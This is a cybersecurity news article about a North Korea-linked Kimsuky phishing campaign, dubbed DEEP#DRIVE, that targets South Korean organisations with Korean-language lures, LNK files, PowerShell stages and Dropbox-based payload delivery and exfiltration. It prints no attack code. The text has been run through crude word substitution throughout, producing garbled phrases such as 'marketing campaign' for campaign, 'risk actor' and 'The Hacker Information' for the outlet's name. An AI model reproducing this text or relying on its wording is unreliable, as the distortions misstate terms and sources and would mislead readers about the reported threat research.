A nation-state risk actor with ties to North Korea has been linked to an ongoing marketing campaign focusing on South Korean enterprise, authorities, and cryptocurrency sectors.
The assault marketing campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group often known as Kimsuky, which can be tracked beneath the names APT43, Black Banshee, Emerald Sleet, Glowing Pisces, Springtail, TA427, and Velvet Chollima.
“Leveraging tailor-made phishing lures written in Korean and disguised as reputable paperwork, the attackers efficiently infiltrated focused environments,” safety researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker Information, describing the exercise as a “subtle and multi-stage operation.”
The decoy paperwork, despatched by way of phishing emails as .HWP, .XLSX, and .PPTX recordsdata, are disguised as work logs, insurance coverage paperwork and crypto-related recordsdata to trick recipients into opening them, thereby triggering the an infection course of.
The assault chain is notable for its heavy reliance on PowerShell scripts at numerous phases, together with payload supply, reconnaissance, and execution. It is also characterised by means of Dropbox for payload distribution and knowledge exfiltration.
All of it begins with a ZIP archive containing a single Home windows shortcut (.LNK) file that masquerades as a reputable doc, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and show a lure doc hosted on Dropbox, whereas stealthily establishing persistence on the Home windows host by way of a scheduled activity named “ChromeUpdateTaskMachine.”
One such lure doc, written in Korean, pertains to a security work plan for forklift operations at a logistics facility, delving into the secure dealing with of heavy cargo and outlining methods to make sure compliance with office security requirements.
The PowerShell script can be designed to contact the identical Dropbox location to fetch one other PowerShell script that is liable for gathering and exfiltrating system data. Moreover, it drops a 3rd PowerShell script that is finally liable for executing an unknown .NET meeting.
“The usage of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance knowledge, similar to system data and energetic processes, to predetermined folders,” the researchers stated.
“This cloud-based infrastructure demonstrates an efficient but stealthy technique of internet hosting and retrieving payloads, bypassing conventional IP or area blocklists. Moreover, the infrastructure appeared dynamic and short-lived, as evidenced by the speedy removing of key hyperlinks after preliminary phases of the assault, a tactic that not solely complicates evaluation but additionally suggests the attackers actively monitor their campaigns for operational safety.”
Securonix stated it was capable of leverage the OAuth tokens to realize further insights into the risk actor’s infrastructure, discovering proof that the marketing campaign might have been underway since September final 12 months.
“Regardless of the lacking ultimate stage, the evaluation highlights the delicate methods employed, together with obfuscation, stealthy execution, and dynamic file processing, which display the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.
